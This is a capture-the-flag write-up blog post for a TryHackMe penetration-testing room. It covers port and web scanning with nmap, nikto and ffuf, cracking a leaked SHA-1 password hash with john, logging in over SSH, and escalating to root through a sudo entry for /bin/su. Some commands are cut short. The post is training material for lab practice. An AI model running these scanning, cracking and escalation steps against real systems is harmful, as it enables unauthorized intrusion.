THM: Crash Course Pen Testing

THM: Crash Course Pen Testing

Write-up for final challenge at CC: Pen Testing room at TryHackMe


3 min read

Basic Information

TypeRegular Box
NameTry Hack Me / CC: Pen Testing
AuthorAsentinn / OkabeRintaro


  1. Basic Information
  2. Recon
  3. Cracking user password
  4. Elevating privileges
  5. Additional readings

๐Ÿ”” CyberEthical.Me is maintained purely from your donations - consider one-time sponsoring with the Sponsor button or ๐ŸŽ become a Patron which also gives you some bonus perks.
Join our Discord Server!


Target IP is - I'm assigning that to the variable for ease of use.

$ IP=

Scanning for open ports

$ nmap -sC -sV -p- $IP -oN nmap-$IP.out


And prepare input for the searchsploit

$ nmap -sC -sV -p 22,80 $IP -oX nmap-$IP.xml
$ searchsploit --nmap nmap-


Firing up nikto and fuff for practice

$ nikto -h $IP -o nikto-$IP.txt


$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/FUZZ -recursion -recursion-depth 1 -e .txt,.php -v -of md -o fuzz-$

ffuf command can be a little complicated, so let me explain it a bit

  • -w: wordlist for fuzzing
  • -u: target URL
  • -recursion, -recursion-depth: when fuff finds a directory, it starts another scan after the current finished (you will recognize it by Job [1/X] label)
  • -e: useful one, simultaneously tries to look for files with listed extensions - be careful with this one though, as it multiplies the amount of work by N where N is a number of extensions (because for each wordlist entry it tries appending these extensions).
  • -v: shows full URL of the findings (useful when using -recursion flag)
  • -of: output format, ffuf output files are not the easiest one to read, but and I choose the Markdown for now
  • -o: and this is just a name for the output file; $IP will resolve variable name and the result


Back to top โคด

Cracking user password

Both find out the /secret/ directory and fuff further tracked the /secret/secret.txt.

$ curl


Which definitely is the hash of user password. I will be using john to crack it, and it could be run blindly on that file, but lets use the hash-identifier that comes with Kali to see the output just out of curiosity.

$ hash-identifier 046385855FC9580393853D8E81F240B66FE9A7B8


As we can see it is the SHA-1 hash. Now cracking it with john:

$ john -format=Raw-SHA1 secret.txt


Which was really fast (don't ever use such weak passwords, of course). So we've got credentials nyan/nyan. Try logging with these on the SSH.

$ ssh nyan@$IP


Were in. I'm getting the user flag.

nyan@ubuntu:~$ cat user.txt

Back to top โคด

Elevating privileges


User nyan can run /bin/su as a root without specifying its password

And just by seeing this sudoer entry we know that nyan is a can execute sudo command.

Otherwise when running sudo -l we would see Sorry, user nyan may not run sudo on ubuntu (where ubuntu is the host name)

We got the root! So cat out that flag and complete the box.

root@ubuntu:/home/nyan# cat /root/root.txt

Additional readings

๐Ÿ“Œ Follow the #CyberEthical hashtag on the social media
๐ŸŽ Become a Patron and gain additional benefits
๐Ÿ‘พ Join CyberEthical Discord server
๐Ÿ‘‰ Instagram:
๐Ÿ‘‰ LinkedIn: Kamil Gierach-Pacanek
๐Ÿ‘‰ Twitter: @cyberethical_me
๐Ÿ‘‰ Facebook: @CyberEthicalMe

Back to top โคด

Did you find this article valuable?

Support Kamil Gierach-Pacanek by becoming a sponsor. Any amount is appreciated!